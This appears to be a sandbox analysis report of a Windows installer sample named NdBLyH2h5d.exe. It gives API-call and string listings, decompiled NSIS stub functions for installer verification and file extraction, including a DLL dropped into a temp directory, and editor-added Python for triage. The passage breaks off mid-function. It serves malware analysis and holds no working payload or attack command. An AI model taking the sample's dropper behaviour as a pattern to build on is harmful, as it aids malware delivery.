                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403632
                                                                              0x00403612

                                                                              APIs
                                                                                • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                                • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                                • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                              • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                                                              • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 00403607
                                                                              • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                                                              • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                                                              • LoadImageA.USER32 ref: 0040366E
                                                                              • RegisterClassA.USER32 ref: 004036B5
                                                                                • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                                                              • CreateWindowExA.USER32 ref: 00403706
                                                                              • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                                                              • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                                                              • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                                                              • GetClassInfoA.USER32 ref: 0040376E
                                                                              • GetClassInfoA.USER32 ref: 0040377D
                                                                              • RegisterClassA.USER32 ref: 0040378D
                                                                              • DialogBoxParamA.USER32 ref: 004037AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: 'z$"C:\Users\user\Desktop\NdBLyH2h5d.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                                                              • API String ID: 914957316-618799758
                                                                              • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                              • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                                                              • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                              • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 81%
                                                                              			E00402C37(void* __eflags, signed int _a4) {
                                                                              				struct HWND__* _v8;
                                                                              				long _v12;
                                                                              				long _v16;
                                                                              				void* _v20;
                                                                              				intOrPtr _v24;
                                                                              				long _v28;
                                                                              				intOrPtr _v32;
                                                                              				intOrPtr _v36;
                                                                              				intOrPtr _v40;
                                                                              				intOrPtr _v44;
                                                                              				signed int _v48;
                                                                              				long _t52;
                                                                              				signed int _t56;
                                                                              				void* _t62;
                                                                              				intOrPtr* _t66;
                                                                              				long _t67;
                                                                              				signed int _t73;
                                                                              				signed int _t78;
                                                                              				signed int _t79;
                                                                              				long _t84;
                                                                              				intOrPtr _t89;
                                                                              				void* _t91;
                                                                              				signed int _t92;
                                                                              				signed int _t93;
                                                                              				signed int _t94;
                                                                              				signed int _t95;
                                                                              				void* _t97;
                                                                              				signed int _t101;
                                                                              				void* _t102;
                                                                              
                                                                              				_v8 = 0;
                                                                              				_t52 = GetTickCount();
                                                                              				_v16 = 0;
                                                                              				_v12 = 0;
                                                                              				_t100 = "C:\\Users\\hardz\\Desktop";
                                                                              				_t97 = _t52 + 0x3e8;
                                                                              				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\hardz\\Desktop", 0x400);
                                                                              				_t91 = E00405690(_t100, 0x80000000, 3);
                                                                              				_v20 = _t91;
                                                                              				 *0x409020 = _t91;
                                                                              				if(_t91 == 0xffffffff) {
                                                                              					return "Error launching installer";
                                                                              				}
                                                                              				E00405513(_t100);
                                                                              				_t56 = GetFileSize(_t91, 0);
                                                                              				__eflags = _t56;
                                                                              				 *0x79d938 = _t56;
                                                                              				_t101 = _t56;
                                                                              				if(_t56 <= 0) {
                                                                              					L27:
                                                                              					__eflags =  *0x7a2f8c;
                                                                              					if( *0x7a2f8c == 0) {
                                                                              						goto L33;
                                                                              					}
                                                                              					__eflags = _v12;
                                                                              					if(_v12 == 0) {
                                                                              						L31:
                                                                              						_t102 = GlobalAlloc(0x40, _v28);
                                                                              						E004030FF( *0x7a2f8c + 0x1c);
                                                                              						_push(_v28);
                                                                              						_push(_t102);
                                                                              						_push(0);
                                                                              						_push(0xffffffff);
                                                                              						_t62 = E00402EBD();
                                                                              						__eflags = _t62 - _v28;
                                                                              						if(_t62 == _v28) {
                                                                              							__eflags = _a4 & 0x00000002;
                                                                              							 *0x7a2f88 = _t102;
                                                                              							if((_a4 & 0x00000002) != 0) {
                                                                              								 *_t102 =  *_t102 | 0x00000008;
                                                                              								__eflags =  *_t102;
                                                                              							}
                                                                              							__eflags = _v48 & 0x00000001;
                                                                              							 *0x7a3020 =  *_t102 & 0x00000018;
                                                                              							 *0x7a2f90 =  *_t102;
                                                                              							if((_v48 & 0x00000001) != 0) {
                                                                              								 *0x7a2f94 =  *0x7a2f94 + 1;
                                                                              								__eflags =  *0x7a2f94;
                                                                              							}
                                                                              							_t49 = _t102 + 0x44; // 0x44
                                                                              							_t66 = _t49;
                                                                              							_t93 = 8;
                                                                              							do {
                                                                              								_t66 = _t66 - 8;
                                                                              								 *_t66 =  *_t66 + _t102;
                                                                              								_t93 = _t93 - 1;
                                                                              								__eflags = _t93;
                                                                              							} while (_t93 != 0);
                                                                              							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
                                                                              							 *(_t102 + 0x3c) = _t67;
                                                                              							E00405670(0x7a2fa0, _t102 + 4, 0x40);
                                                                              							__eflags = 0;
                                                                              							return 0;
                                                                              						}
                                                                              						GlobalFree(_t102);
                                                                              						goto L33;
                                                                              					}
                                                                              					E004030FF( *0x789930);
                                                                              					_t73 = E004030CD( &_v12, 4); // executed
                                                                              					__eflags = _t73;
                                                                              					if(_t73 == 0) {
                                                                              						goto L33;
                                                                              					}
                                                                              					__eflags = _v16 - _v12;
                                                                              					if(_v16 != _v12) {
                                                                              						goto L33;
                                                                              					}
                                                                              					goto L31;
                                                                              				} else {
                                                                              					do {
                                                                              						_t92 = _t101;
                                                                              						asm("sbb eax, eax");
                                                                              						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
                                                                              						__eflags = _t101 - _t78;
                                                                              						if(_t101 >= _t78) {
                                                                              							_t92 = _t78;
                                                                              						}
                                                                              						_t79 = E004030CD(0x795938, _t92); // executed
                                                                              						__eflags = _t79;
                                                                              						if(_t79 == 0) {
                                                                              							__eflags = _v8;
                                                                              							if(_v8 != 0) {
                                                                              								DestroyWindow(_v8);
                                                                              							}
                                                                              							L33:
                                                                              							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                                                                              						}
                                                                              						__eflags =  *0x7a2f8c;
                                                                              						if( *0x7a2f8c != 0) {
                                                                              							__eflags = _a4 & 0x00000002;
                                                                              							if((_a4 & 0x00000002) == 0) {
                                                                              								__eflags = _v8;
                                                                              								if(_v8 == 0) {
                                                                              									_t84 = GetTickCount();
                                                                              									__eflags = _t84 - _t97;
                                                                              									if(_t84 > _t97) {
                                                                              										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
                                                                              									}
                                                                              								} else {
                                                                              									E00405CFC(0);
                                                                              								}
                                                                              							}
                                                                              							goto L22;
                                                                              						}
                                                                              						E00405670( &_v48, 0x795938, 0x1c);
                                                                              						_t94 = _v48;
                                                                              						__eflags = _t94 & 0xfffffff0;
                                                                              						if((_t94 & 0xfffffff0) != 0) {
                                                                              							goto L22;
                                                                              						}
                                                                              						__eflags = _v44 - 0xdeadbeef;
                                                                              						if(_v44 != 0xdeadbeef) {
                                                                              							goto L22;
                                                                              						}
                                                                              						__eflags = _v32 - 0x74736e49;
                                                                              						if(_v32 != 0x74736e49) {
                                                                              							goto L22;
                                                                              						}
                                                                              						__eflags = _v36 - 0x74666f73;
                                                                              						if(_v36 != 0x74666f73) {
                                                                              							goto L22;
                                                                              						}
                                                                              						__eflags = _v40 - 0x6c6c754e;
                                                                              						if(_v40 != 0x6c6c754e) {
                                                                              							goto L22;
                                                                              						}
                                                                              						_t89 = _v24;
                                                                              						__eflags = _t89 - _t101;
                                                                              						if(_t89 > _t101) {
                                                                              							goto L33;
                                                                              						}
                                                                              						_a4 = _a4 | _t94;
                                                                              						_t95 =  *0x789930; // 0x32903
                                                                              						__eflags = _a4 & 0x00000008;
                                                                              						 *0x7a2f8c = _t95;
                                                                              						if((_a4 & 0x00000008) != 0) {
                                                                              							L15:
                                                                              							_v12 = _v12 + 1;
                                                                              							_t24 = _t89 - 4; // 0x1c
                                                                              							_t101 = _t24;
                                                                              							__eflags = _t92 - _t101;
                                                                              							if(_t92 > _t101) {
                                                                              								_t92 = _t101;
                                                                              							}
                                                                              							goto L22;
                                                                              						}
                                                                              						__eflags = _a4 & 0x00000004;
                                                                              						if((_a4 & 0x00000004) != 0) {
                                                                              							break;
                                                                              						}
                                                                              						goto L15;
                                                                              						L22:
                                                                              						__eflags = _t101 -  *0x79d938; // 0x32907
                                                                              						if(__eflags < 0) {
                                                                              							_v16 = E00405D2F(_v16, 0x795938, _t92);
                                                                              						}
                                                                              						 *0x789930 =  *0x789930 + _t92;
                                                                              						_t101 = _t101 - _t92;
                                                                              						__eflags = _t101;
                                                                              					} while (_t101 > 0);
                                                                              					__eflags = _v8;
                                                                              					if(_v8 != 0) {
                                                                              						DestroyWindow(_v8);
                                                                              					}
                                                                              					goto L27;
                                                                              				}
                                                                              			}

                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00402C45
                                                                              • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                                                                • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                                • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                              • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                                                              • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\NdBLyH2h5d.exe" , xrefs: 00402C41
                                                                              • soft, xrefs: 00402D26
                                                                              • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                              • Error launching installer, xrefs: 00402C8D
                                                                              • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                              • Inst, xrefs: 00402D19
                                                                              • Null, xrefs: 00402D2F
                                                                              • verifying installer: %d%%, xrefs: 00402D89
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                              • String ID: "C:\Users\user\Desktop\NdBLyH2h5d.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                              • API String ID: 2181728824-204383345
                                                                              • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                              • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
                                                                              • Opcode Fuzzy Hash: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
                                                                              • Instruction Fuzzy Hash: 8561CE30900215EBDB219F64DE49B9EBBB4BF45714F20813AF900B22E2D7BC9D418B9C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
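The "APIs" and "Strings" listings above are the part of this view that is actually useful for triage once the disassembly has been flattened to text: they keep the call arguments, the call-site addresses and the string cross-references. The Python below is an added example for this page, not part of the report and not code from the sample. It parses those two listings in the plain-text form shown here, collects every Windows path that appears in an argument or string, and flags paths under an NSIS plugin directory (%TEMP%\ns<letter><hex>.tmp\, which is the editor's assumption about how NSIS stubs name that directory, not something the report states). The input is constructed from lines on this page; the last Strings line is built from the DLL path that appears in the decompiled code, with a placeholder xref of 00000000.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# One "• Api.Module(arg, arg, ...), ref: ADDR" line, optionally prefixed with
# "Part of subcall function ADDR:"; the no-argument form has no parentheses.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# One "• <string>, xrefs: ADDR, ADDR" line.
STR_RE = re.compile(r"^\s*•\s*(?P<s>.*?)\s*,\s*xrefs:\s*(?P<xrefs>[0-9A-Fa-f][0-9A-Fa-f, ]*?)\s*$")
# A drive-letter path as printed in the listing; ends at the next argument or quote.
WIN_PATH_RE = re.compile(r'[A-Za-z]:\\[^,"]*')
# Assumption: NSIS unpacks plugin DLLs into %TEMP%\ns<letter><hex>.tmp\ .
NSIS_PLUGIN_DIR_RE = re.compile(r"\\Temp\\ns[A-Za-z][0-9A-Fa-f]{1,4}\.tmp\\", re.IGNORECASE)

SECTION_HEADERS = ("APIs", "Strings", "Memory Dump Source", "Similarity", "Uniqueness")


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: str
    subcall_of: Optional[str] = None   # address of the helper this call sits in, if any


def split_args(raw: Optional[str]) -> Tuple[str, ...]:
    # Arguments are comma separated and are addresses, small integers, "?" or
    # path/message strings. A comma inside a string would break this split;
    # none of the strings in this report contain one.
    if not raw:
        return ()
    return tuple(a.strip() for a in raw.split(","))


def parse_listing(text: str) -> Tuple[List[ApiCall], List[Tuple[str, List[str]]]]:
    """Walk the flattened report text and return (api calls, (string, xrefs))."""
    calls: List[ApiCall] = []
    strings: List[Tuple[str, List[str]]] = []
    section = None
    for line in text.splitlines():
        head = line.strip()
        if head in SECTION_HEADERS:
            section = head
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                calls.append(ApiCall(m["api"], m["mod"], split_args(m["args"]),
                                     m["ref"].upper(), m["sub"]))
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                xrefs = [x.strip() for x in m["xrefs"].split(",") if x.strip()]
                strings.append((m["s"].strip(), xrefs))
    return calls, strings


def collect_paths(calls: List[ApiCall], strings: List[Tuple[str, List[str]]]) -> Set[str]:
    found: Set[str] = set()
    for c in calls:
        for a in c.args:
            found.update(p.rstrip() for p in WIN_PATH_RE.findall(a))
    for s, _ in strings:
        found.update(p.rstrip() for p in WIN_PATH_RE.findall(s))
    return found


def nsis_plugin_drops(paths: Set[str]) -> List[str]:
    return sorted(p for p in paths if NSIS_PLUGIN_DIR_RE.search(p))


# Constructed input: lines copied from this report page, plus one Strings line
# built from the DLL path in the decompiled function (placeholder xref).
REPORT_EXCERPT = r"""
APIs
• GetTickCount.KERNEL32 ref: 00402C45
• GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
  • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
• GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
Strings
• "C:\Users\user\Desktop\NdBLyH2h5d.exe" , xrefs: 00402C41
• C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
• verifying installer: %d%%, xrefs: 00402D89
• C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll, xrefs: 00000000
Memory Dump Source
"""


def summarize(text: str) -> dict:
    calls, strings = parse_listing(text)
    paths = collect_paths(calls, strings)
    return {"calls": len(calls), "paths": sorted(paths), "nsis_plugin_drops": nsis_plugin_drops(paths)}


if __name__ == "__main__":
    for k, v in summarize(REPORT_EXCERPT).items():
        print(k, v)
```

The section-aware loop matters: Strings entries also start with a bullet and a message string such as "Error writing temporary file. Make sure ..." would otherwise be a near miss for the API pattern. The plugin-directory hit is the pivot worth taking from this view; the stub's own calls (GetModuleFileNameA, GetFileSize, GlobalAlloc) are the same in every NSIS installer.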

                                                                              C-Code - Quality: 57%
                                                                              			E0040179D(FILETIME* __ebx, void* __eflags) {
                                                                              				void* _t33;
                                                                              				void* _t41;
                                                                              				void* _t43;
                                                                              				long _t49;
                                                                              				long _t62;
                                                                              				signed char _t63;
                                                                              				long _t64;
                                                                              				void* _t66;
                                                                              				long _t72;
                                                                              				FILETIME* _t73;
                                                                              				FILETIME* _t77;
                                                                              				signed int _t79;
                                                                              				void* _t82;
                                                                              				CHAR* _t84;
                                                                              				void* _t87;
                                                                              
                                                                              				_t77 = __ebx;
                                                                              				_t84 = E00402A9A(0x31);
                                                                              				 *(_t87 - 0x34) = _t84;
                                                                              				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
                                                                              				_t33 = E00405538(_t84);
                                                                              				_push(_t84);
                                                                              				if(_t33 == 0) {
                                                                              					lstrcatA(E004054CC(E004059BF(0x409c18, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                              				} else {
                                                                              					_push(0x409c18);
                                                                              					E004059BF();
                                                                              				}
                                                                              				E00405BFB(0x409c18);
                                                                              				while(1) {
                                                                              					__eflags =  *(_t87 + 8) - 3;
                                                                              					if( *(_t87 + 8) >= 3) {
                                                                              						_t66 = E00405C94(0x409c18);
                                                                              						_t79 = 0;
                                                                              						__eflags = _t66 - _t77;
                                                                              						if(_t66 != _t77) {
                                                                              							_t73 = _t66 + 0x14;
                                                                              							__eflags = _t73;
                                                                              							_t79 = CompareFileTime(_t73, _t87 - 0x18);
                                                                              						}
                                                                              						asm("sbb eax, eax");
                                                                              						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                              						__eflags = _t72;
                                                                              						 *(_t87 + 8) = _t72;
                                                                              					}
                                                                              					__eflags =  *(_t87 + 8) - _t77;
                                                                              					if( *(_t87 + 8) == _t77) {
                                                                              						_t63 = GetFileAttributesA(0x409c18); // executed
                                                                              						_t64 = _t63 & 0x000000fe;
                                                                              						__eflags = _t64;
                                                                              						SetFileAttributesA(0x409c18, _t64); // executed
                                                                              					}
                                                                              					__eflags =  *(_t87 + 8) - 1;
                                                                              					_t41 = E00405690(0x409c18, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
                                                                              					__eflags = _t41 - 0xffffffff;
                                                                              					 *(_t87 - 8) = _t41;
                                                                              					if(_t41 != 0xffffffff) {
                                                                              						break;
                                                                              					}
                                                                              					__eflags =  *(_t87 + 8) - _t77;
                                                                              					if( *(_t87 + 8) != _t77) {
                                                                              						E00404D62(0xffffffe2,  *(_t87 - 0x34));
                                                                              						__eflags =  *(_t87 + 8) - 2;
                                                                              						if(__eflags == 0) {
                                                                              							 *((intOrPtr*)(_t87 - 4)) = 1;
                                                                              						}
                                                                              						L31:
                                                                              						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t87 - 4));
                                                                              						__eflags =  *0x7a3008;
                                                                              						goto L32;
                                                                              					} else {
                                                                              						E004059BF(0x40a418, 0x7a4000);
                                                                              						E004059BF(0x7a4000, 0x409c18);
                                                                              						E004059E1(_t77, 0x40a418, 0x409c18, "C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll",  *((intOrPtr*)(_t87 - 0x10)));
                                                                              						E004059BF(0x7a4000, 0x40a418);
                                                                              						_t62 = E004052BF("C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll",  *(_t87 - 0x24) >> 3) - 4;
                                                                              						__eflags = _t62;
                                                                              						if(_t62 == 0) {
                                                                              							continue;
                                                                              						} else {
                                                                              							__eflags = _t62 == 1;
                                                                              							if(_t62 == 1) {
                                                                              								 *0x7a3008 =  *0x7a3008 + 1;
                                                                              								L32:
                                                                              								_t49 = 0;
                                                                              								__eflags = 0;
                                                                              							} else {
                                                                              								_push(0x409c18);
                                                                              								_push(0xfffffffa);
                                                                              								E00404D62();
                                                                              								L29:
                                                                              								_t49 = 0x7fffffff;
                                                                              							}
                                                                              						}
                                                                              					}
                                                                              					L33:
                                                                              					return _t49;
                                                                              				}
                                                                              				E00404D62(0xffffffea,  *(_t87 - 0x34));
                                                                              				 *0x4092a0 =  *0x4092a0 + 1;
                                                                              				_push(_t77);
                                                                              				_push(_t77);
                                                                              				_push( *(_t87 - 8));
                                                                              				_push( *((intOrPtr*)(_t87 - 0x1c)));
                                                                              				_t43 = E00402EBD(); // executed
                                                                              				 *0x4092a0 =  *0x4092a0 - 1;
                                                                              				__eflags =  *(_t87 - 0x18) - 0xffffffff;
                                                                              				_t82 = _t43;
                                                                              				if( *(_t87 - 0x18) != 0xffffffff) {
                                                                              					L22:
                                                                              					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
                                                                              				} else {
                                                                              					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
                                                                              					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
                                                                              						goto L22;
                                                                              					}
                                                                              				}
                                                                              				FindCloseChangeNotification( *(_t87 - 8)); // executed
                                                                              				__eflags = _t82 - _t77;
                                                                              				if(_t82 >= _t77) {
                                                                              					goto L31;
                                                                              				} else {
                                                                              					__eflags = _t82 - 0xfffffffe;
                                                                              					if(_t82 != 0xfffffffe) {
                                                                              						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffee);
                                                                              					} else {
                                                                              						E004059E1(_t77, _t82, 0x409c18, 0x409c18, 0xffffffe9);
                                                                              						lstrcatA(0x409c18,  *(_t87 - 0x34));
                                                                              					}
                                                                              					_push(0x200010);
                                                                              					_push(0x409c18);
                                                                              					E004052BF();
                                                                              					goto L29;
                                                                              				}
                                                                              				goto L33;
                                                                              			}
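In plain terms, the decompiled function above is the NSIS 2.x installer stub's handler for the File opcode (EW_EXTRACTFILE). That identification is the editor's, made from the structure rather than from anything the report states: the overwrite mode is the low three bits of the first parameter (& 7), the file-exists helper returns a WIN32_FIND_DATA whose ftLastWriteTime sits at offset 0x14, CREATE_NEW or CREATE_ALWAYS is picked from that mode, the read-only attribute is cleared with & 0xfe before the file is truncated, and the Abort/Retry/Ignore message-box result is folded with "- 4". The FindCloseChangeNotification call on the file handle is most likely the sandbox resolving the call target by address (that export commonly shares its implementation with CloseHandle in kernel32); NSIS itself calls CloseHandle there. The practical point for triage is that this code is identical in every NSIS-built installer, so the sample-specific behaviour is in what gets extracted (for example the DLL written under the ns<...>.tmp directory in %TEMP%), not in this handler. The Python below is an added model of those decisions, written for this page; it is not code from the sample or from NSIS. The Win32 constant values are real, the function names and the timestamp integers are the editor's.

```python
from enum import IntEnum
from typing import Optional, Tuple

# Win32 values (real); everything else models the decompiled E0040179D.
CREATE_NEW, CREATE_ALWAYS = 1, 2
FILE_ATTRIBUTE_READONLY = 0x01
IDABORT, IDRETRY, IDIGNORE = 3, 4, 5
EXEC_ERROR = 0x7FFFFFFF          # the 0x7fffffff the function returns on abort


class Overwrite(IntEnum):
    """Low three bits of the first opcode parameter: *(_t87 - 0x24) & 7."""
    ON = 0        # SetOverwrite on: always overwrite
    OFF = 1       # SetOverwrite off: keep an existing file
    TRY = 2       # SetOverwrite try: like 'on', but a failure to open is not fatal
    IFNEWER = 3   # overwrite only when the embedded file is newer
    IFDIFF = 4    # overwrite when the timestamps differ


def compare_filetime(a: int, b: int) -> int:
    """CompareFileTime: -1, 0 or 1, with FILETIMEs as integers here."""
    return (a > b) - (a < b)


def resolve_overwrite(mode: int, existing_mtime: Optional[int], embedded_mtime: int) -> int:
    """The '>= 3' branch. Modes 3 and 4 collapse to 0 (overwrite) or 1 (skip)
    via !(((mode - 3) | 0x80000000) & r), where r is CompareFileTime(existing
    ftLastWriteTime, embedded time) as a 32-bit value and r == 0 when the file
    does not exist. For IFNEWER the mask is only the sign bit (r < 0, existing
    file older); for IFDIFF bit 0 is added, so any non-zero r overwrites."""
    if mode < 3:
        return int(mode)
    r = 0
    if existing_mtime is not None:
        r = compare_filetime(existing_mtime, embedded_mtime) & 0xFFFFFFFF
    mask = ((mode - 3) | 0x80000000) & 0xFFFFFFFF
    return 0 if (mask & r) else 1


def creation_disposition(flag: int) -> int:
    """(0 | flag != 1) + 1: CREATE_NEW when skipping, so an existing file makes
    the open fail and the 'skipped' path runs; CREATE_ALWAYS otherwise."""
    return CREATE_NEW if flag == 1 else CREATE_ALWAYS


def attributes_before_open(flag: int, attrs: int) -> int:
    """For flag == 0 the stub does SetFileAttributesA(path, attrs & 0xfe),
    clearing FILE_ATTRIBUTE_READONLY so that CREATE_ALWAYS can truncate."""
    return attrs & ~FILE_ATTRIBUTE_READONLY if flag == 0 else attrs


def on_open_failure(flag: int, msgbox_result: int) -> Tuple[str, int]:
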